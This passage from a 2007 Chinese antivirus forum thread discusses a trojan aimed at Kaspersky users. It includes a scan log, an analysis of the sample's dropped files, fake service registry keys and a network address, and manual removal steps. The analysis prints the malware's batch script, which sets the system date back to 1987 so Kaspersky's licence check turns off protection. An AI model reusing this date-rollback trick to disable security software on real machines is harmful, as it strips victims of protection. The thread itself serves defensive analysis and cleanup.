12
返回列表 发新帖
楼主: tonger2003
收起左侧

[病毒样本] 一木马程序~~~好象是针对卡吧的

[复制链接]
bridgewr
发表于 2007-3-18 21:51:30 | 显示全部楼层
一个bat文件,运行后调用cmd,然后cmd又调用ping。exe,微点没有报,上报他们分析下
m689800
发表于 2007-4-1 21:02:37 | 显示全部楼层
请问 用什么 杀啊
m689800
发表于 2007-4-1 21:07:14 | 显示全部楼层
请问 楼主 怎么杀啊
m689800
发表于 2007-4-1 21:09:43 | 显示全部楼层
请  大哥 们 发个专杀工具 上来阿
m689800
发表于 2007-4-1 21:10:15 | 显示全部楼层
已删除: 木马程序 Trojan.BAT.KillAV.ec        文件: C:\WINDOWS\system32\GoKaba.bat
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\System32\11753992972.exe
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\System32\11754007822.exe
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\System32\11754179992.exe
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\System32\11754284512.exe
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\System32\11754303292.exe
未发现: 木马程序 Trojan.BAT.KillAV.ec        文件: C:\WINDOWS\system32\GOKABA.BAT
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\system32\winlogon.exe
已检测到: 风险软件 Trojan.generic        运行进程: C:\WINDOWS\system32\services.exe
m689800
发表于 2007-4-1 21:11:13 | 显示全部楼层
一个对付卡巴的病毒
卡巴的用户,系统时间全部改为1987-10-18
样本动作
判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat
文件内容

CODE:[Copy to clipboard]@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0=>将系统时间调整为1987-10-18
卡巴的监控立刻失效
成功完成K.O.卡巴后
---------------------------------------------------------------------------------------------
以下为所有机子状况
释放文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat
* =随机8位字母(如7F9DE518\312E0FDA)
注册表变化
添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "DisplayName" = *
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Description" = 为系统提供加速启动功能(d-sp1)。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ErrorControl" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ImagePath" = C:\WINDOWS\System32\* -service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "ObjectName" = LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Start" = [REG_DWORD, value: 00000002]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Type" = [REG_DWORD, value: 00000010]
=>sreng显示
[* / *][Running/Auto Start]
*.EXE -service>
%SystemRoot%\system32\*.EXE
链接网络
地址:61.139.126.62
端口:80
解决方案
1.重启进去安全模式
2.使用Autoruns


打开Autoruns->点击Sevices->对Sevices下的8位字母->右键->Verify(认证)->很容易判断出哪个是病毒文件 (Not Verify)Microsoft Corporation------------------------->


3.记住路径 和 文件名
4.继续用Autoruns 右键点击病毒文件 -> Delecte
5.找到刚记下的目录,删除
c:\windows\system32\*.EXE
c:\windows\system32\*T.EXE
c:\windows\system32\*.DLL
6.如果是卡巴的用户 时间被改到1987-10-18自己手动改回来即可
思考
卡巴一直以来是我们大家公认的"强者",但是树大招风,时间的更改,就直接让卡巴去见阎王,这是为什么?->卡巴过于追求自己的技术,在反盗版应用过于苛刻,如果授权过期,他将停止一切使用,包括主动防御,扫描病毒等等.即使用户使用了离线更新包,卡巴一样哑火.
这是现在一些追求卡巴fans值得思考的问题,同时也是卡巴自己应该反思的最重要的问题
askelva
发表于 2007-4-1 21:47:02 | 显示全部楼层

回复 #1 tonger2003 的帖子

晕,过咖啡了,又被过。5555555555555555555555555555555
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 14:34 , Processed in 0.094730 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表